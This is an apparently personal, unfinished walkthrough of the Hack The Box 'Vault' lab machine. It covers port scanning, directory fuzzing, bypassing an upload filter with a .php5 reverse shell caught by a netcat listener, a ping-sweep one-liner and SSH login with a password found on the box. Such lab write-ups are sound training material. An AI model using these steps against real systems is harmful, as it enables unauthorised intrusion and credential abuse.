Hackthebox - Vault

Vault

Nmap

┌─[✗]─[gabrielle@parrot]─[~]
└──╼ $sudo nmap -p- -sV -sC 10.10.10.109
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-26 20:05 EDT
Nmap scan report for 10.10.10.109
Host is up (0.057s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a6:9d:0f:7d:73:75:bb:a8:94:0a:b7:e3:fe:1f:24:f4 (RSA)
|   256 2c:7c:34:eb:3a:eb:04:03:ac:48:28:54:09:74:3d:27 (ECDSA)
|_  256 98:42:5f:ad:87:22:92:6d:72:e6:66:6c:82:c1:09:83 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.91 seconds

Port 80

We have this page

Wfuzz was useless from root but it mentionned a customer. If we try to go to /sparklays we get a Forbidden which means that we could try wfuzz again but with this.

I had to wfuzz multiple times but here are the commands and interesting results I got:

wfuzz -c --hc 404 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt http://10.10.10.109/sparklays/FUZZ
000000370:   301        9 L      28 W       323 Ch      "design"  

wfuzz -c --hc 404 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/Common-PHP-Filenames.txt http://10.10.10.109/sparklays/FUZZ

000000029:   200        3 L      2 W        16 Ch       "login.php"                                                                                                                  
000000016:   200        13 L     38 W       615 Ch      "admin.php"  

wfuzz -c --hc 404 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt http://10.10.10.109/sparklays/design/FUZZ

000000164:   301        9 L      28 W       331 Ch      "uploads" 

In the meantime, wfuzz was quite a pain so I tried gobuster which I usually prefer (but wanted to try out wfuzz lol). And I got this

┌─[gabrielle@parrot]─[/usr/share/wordlists]
└──╼ $gobuster dir -u http://10.10.10.109/sparklays/design/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -x php,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.109/sparklays/design/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 308]
/.html                (Status: 403) [Size: 309]
/uploads              (Status: 301) [Size: 331] [--> http://10.10.10.109/sparklays/design/uploads/]
/design.html          (Status: 200) [Size: 72]

So from these we have:

http://10.10.10.109/sparklays/design/uploads/
http://10.10.10.109/sparklays/admin.php
http://10.10.10.109/sparklays/login.php
http://10.10.10.109/sparklays/design/design.html
  • On login.php we get an access denied

  • But on admin.php we get a login page

Login

I tried bruteforcing along with possible weak password but did not get anywhere.

  • On /design/design.html we get this

  • And if we click on change logo we end up here so we can play with the upload function.

change logo

I tried a few file extensions and got this working with php5. So I downloaded php-reverse-shell.php5 on the server after modifying the file with my ip address. I set up my listener nc -nlvp 4444 And then I accessed this page from the browser (remember the uploads directory we found before) http://10.10.10.109/sparklays/design/uploads/php-reverse-shell.php5

And I got a shell as www-data:

Shell

I chose to play with this machine because I wanted to practice pivoting. So let's check what we have available here in terms of network with arp -a (if for some reason arp -a does not work a friend of mine uses a cool command for i in {1..254} ;do (ping 192.168.122.$i -c 1 -w 5 >/dev/null && echo "192.168.122.$i" &) ;done). But here arp -a works and we get this: But first let's see if we can mobe to a user. if we ls on /home we have 2 users dave and alex. If we go to dave's Desktop we find this. So let's try to ssh as Dave (with the password we found Dav3therav3123). It works:

Coming soon

Last updated